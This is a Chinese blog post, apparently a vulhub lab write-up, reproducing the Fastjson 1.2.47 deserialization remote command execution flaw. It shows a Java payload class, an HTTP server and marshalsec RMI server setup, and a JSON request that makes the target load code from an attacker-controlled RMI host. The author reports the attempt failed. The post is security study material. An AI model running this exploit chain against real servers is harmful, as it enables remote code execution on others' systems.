Fastjson 1.2.47 远程命令执行漏洞

最新推荐文章于 2024-04-23 10:29:35 发布
最新推荐文章于 2024-04-23 10:29:35 发布
阅读量137 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全 java jdk
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117466188
版权

漏洞背景

Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。

漏洞复现

编译java文件为class(详细可以参考我的这篇文章

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

在该目录下用python个简便的HTTP

python2 -m SimpleHTTPServer 7777
python3 -m http.server 7777

然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://your_ip/#TouchFile" 9999

向靶场服务器发送Payload:

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://your_ip:9999/Exploit",
        "autoCommit":true
    }
}

用的也是vulhub的环境,也是没复现出来,吐了…

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fastjson 1.2.47 远程命令执行
锋刃科技的博客
06-11 2302
1. 漏洞简介 Fastjosn 无疑是这两年的漏洞之王, 一手反序列化RCE影响无数厂商, 目前1.2.48以下版本稳定受影响, 1.2.68以下版本开启Autotype会受到影响 (不排除传说中的1.2.67以下RCE漏洞, 期待八仙过海) 2. 影响组件 Fastjson < 1.2.48 (<1.2.68?) 3. 漏洞指纹 可以通过DNS回显的方式检测后端是否使用Fastjson {"@type":"java.net.Inet4Address", "val":"dnsl
fastjson1.2.47RCE远程命令执行漏洞复现
zyl404的博客
01-06 1805
fastjson1.2.47RCE远程命令执行漏洞分析 漏洞背景 在2019年6月,fastjson 被爆出在 fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令漏洞分析 此漏洞利用的核心点是java.lang.class这个java的基础类,在fastjson 1.2.48以前的版本没有做该类做任何限制,加上代码的一些逻辑缺陷,造成黑名单以及autotype的绕过。 过程: 1.Fastjson在开始解析json (JS 对象
Fastjson【RCE1.2.47漏洞复现
02-24 1269
Fastjson漏洞原理和RCE1.2.47漏洞复现
Fastjson1.2.47以及之前的所有版本
10-26
Fastjson1.2.47以及之前的所有版本
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
最新发布
小司机的奥拓
04-23 2364
在复现的过程中我也出现了许多的问题,最后发送bp改过的数据包之后,一直无法获取shell,也无法创建文件。后来发现是javajavac的版本问题,一定要保证二者都是1.8的版本!其他fastjson漏洞原理相似,只不过是增加了一下黑白名单的过滤,也存在对应的绕过方法,大家可以CSDN上再搜一搜,有很多相关文章。
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 2420
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。
FastJson反序列化漏洞Fastjson1.2.47
jxy158212的博客
02-24 672
Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列化),当然它也可以将 JSON 字符串转换为 Java 对象(反序列化)它采用一种“假定有序快速匹配”的算法,把 JSON Parse 的性能提升到极致,是目前 Java 语言中最快的 JSON 库,并且它不依赖于其它任何库。Fastjson已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。
Fastjson 1.2.47 远程命令执行漏洞复现分析环境
itgather的博客
04-04 1125
Fastjson-less1-2-47远程命令执行.rar(访问密码: 1150)
fastjson反序列化漏洞fastjson-1.2.47
zyer
04-28 4002
fastjson 1.2.47 爆出了最为严重的漏洞,可以在不开启 AutoTypeSupport 的情况下进行反序列化的利用。 一.原理 测试代码Test.java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Test { public static void main(String[] args) { String s2 =...
fastjson1.2.47远程代码漏洞解决方案.rar
07-12
Fastjson 1.2.47 远程代码执行漏洞详解及修复策略》 Fastjson,一个由阿里巴巴开发的高性能、轻量级的Java语言JSON处理库,因其高效的解析速度和广泛的功能,在国内的互联网行业中被广泛应用。然而,任何优秀的...
fastjson-1.2.47及源码、简单示例
08-30
fastjson-1.2.47及源码、简单示例
fastjson-1.2.47官方jar包下载
09-05
阿里巴巴FastJson是一个Json处理工具包,包括“序列化”和“反序列化”两部分,它具备如下特征:速度最快,测试表明,fastjson具有极快的性能,超越任其他的JavaJson
fastjson-1.2.47
12-07
fastjson-1.2.34
fastjson-1.2.47.jar
03-16
fastjson-1.2.47.jar,用于将java转换成json**********
Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3366
Fastjson 1.2.47反序列化漏洞复现
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 6922
fastjson反序列化漏洞原理及利用
fastjson1.2.47漏洞复现
07-27
- *1* *3* [Fastjson命令执行漏洞复现(1.2.471.2.24)](https://blog.csdn.net/xiaobai_20190815/article/details/124117105)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值